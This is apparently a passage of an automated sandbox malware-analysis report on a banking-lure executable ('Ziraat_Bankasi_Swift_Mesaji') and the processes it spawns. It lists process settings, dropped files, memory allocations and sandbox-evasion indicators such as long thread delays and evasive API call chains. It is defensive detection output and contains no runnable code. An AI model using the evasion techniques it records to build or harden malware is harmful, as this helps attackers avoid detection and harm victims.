                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          barindex
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeAPI/Special instruction interceptor: Address: 15D320C
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeAPI/Special instruction interceptor: Address: 16A8C4C
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeAPI/Special instruction interceptor: Address: EAAF5C
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeAPI/Special instruction interceptor: Address: 11FEF84
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeAPI/Special instruction interceptor: Address: D1824C
                          Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 5B90000 memory reserve | memory write watchJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 5F00000 memory reserve | memory write watchJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 7F00000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeMemory allocated: FD0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeMemory allocated: 2960000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeMemory allocated: 4960000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeMemory allocated: EE0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeMemory allocated: 2870000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeMemory allocated: EE0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: 2560000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: 2610000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeMemory allocated: 2560000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 1850000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 3350000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 30A0000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 16A0000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 30E0000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 50E0000 memory reserve | memory write watch
                          Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 5BD0000 memory reserve | memory write watch
                          Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 6200000 memory reserve | memory write watch
                          Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 8200000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeMemory allocated: 21A0000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeMemory allocated: 23E0000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeMemory allocated: 2200000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 1240000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 2E30000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 4E30000 memory reserve | memory write watch
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,5_2_004019F0
                          Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindow / User API: threadDelayed 3422Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindow / User API: threadDelayed 6379Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7994
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1615
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeWindow / User API: threadDelayed 5165
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeWindow / User API: threadDelayed 4623
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\bothsided\spadixes.exeJump to dropped file
                          Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Windows\System32\alg.exeJump to dropped file
                          Source: C:\Windows\SysWOW64\svchost.exeDropped PE file which has not been started: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeJump to dropped file
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeEvaded block: after key decisiongraph_0-54111
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeEvaded block: after key decisiongraph_2-55166
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_2-55022
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-55006
                          Source: C:\Windows\SysWOW64\svchost.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep
                          Source: C:\Windows\SysWOW64\svchost.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                          Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeAPI coverage: 5.0 %
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeAPI coverage: 5.7 %
                          Source: C:\Windows\SysWOW64\svchost.exe TID: 6988Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe TID: 5940Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388Thread sleep time: -35048813740048126s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388Thread sleep time: -100000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388Thread sleep time: -99890s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388Thread sleep time: -99780s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388Thread sleep time: -99671s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388Thread sleep time: -99562s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388Thread sleep time: -99452s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388Thread sleep time: -99343s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388Thread sleep time: -99230s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388Thread sleep time: -99080s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388Thread sleep time: -98888s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388Thread sleep time: -98636s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388Thread sleep time: -98062s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388Thread sleep time: -97640s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388Thread sleep time: -97500s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388Thread sleep time: -97374s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388Thread sleep time: -97265s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388Thread sleep time: -97145s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388Thread sleep time: -97015s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388Thread sleep time: -96888s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388Thread sleep time: -96780s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388Thread sleep time: -96661s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388Thread sleep time: -96546s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388Thread sleep time: -96437s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388Thread sleep time: -96328s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388Thread sleep time: -96218s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388Thread sleep time: -96109s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388Thread sleep time: -96000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388Thread sleep time: -95890s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388Thread sleep time: -95781s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388Thread sleep time: -95671s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388Thread sleep time: -95558s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388Thread sleep time: -95453s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388Thread sleep time: -95266s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388Thread sleep time: -95106s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388Thread sleep time: -94873s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388Thread sleep time: -94317s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388Thread sleep time: -94184s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388Thread sleep time: -94078s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388Thread sleep time: -93968s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388Thread sleep time: -93859s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388Thread sleep time: -93749s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388Thread sleep time: -93640s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388Thread sleep time: -93531s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388Thread sleep time: -93421s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388Thread sleep time: -93312s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388Thread sleep time: -99874s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388Thread sleep time: -99766s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388Thread sleep time: -99632s >= -30000sJump to behavior
